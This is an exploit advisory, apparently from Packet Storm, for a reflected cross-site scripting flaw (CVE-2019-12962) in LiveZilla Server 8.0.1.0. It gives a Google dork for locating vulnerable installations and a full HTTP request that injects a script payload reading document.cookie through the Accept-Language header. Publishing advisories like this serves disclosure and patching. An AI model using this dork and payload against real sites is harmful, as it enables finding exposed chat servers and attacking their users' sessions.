LiveZilla Server version 8.0.1.0 suffers from a cross site scripting vulnerability.
db3e15ccee623c8f25470aa46cc48050395fce776022c46b16c3d17c38755694# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
# Date: 18 Mars 2021
# Exploit Author: Clément Cruchet
# Vendor Homepage: https://www.livezilla.net
# Software Link: https://www.livezilla.net/downloads/en/
# Version: LiveZilla Server 8.0.1.0 and before
# Tested on: Windows/Linux
# CVE : CVE-2019-12962
GET /mobile/index.php HTTP/1.1
Host: chat.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ';alert(document.cookie)//
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed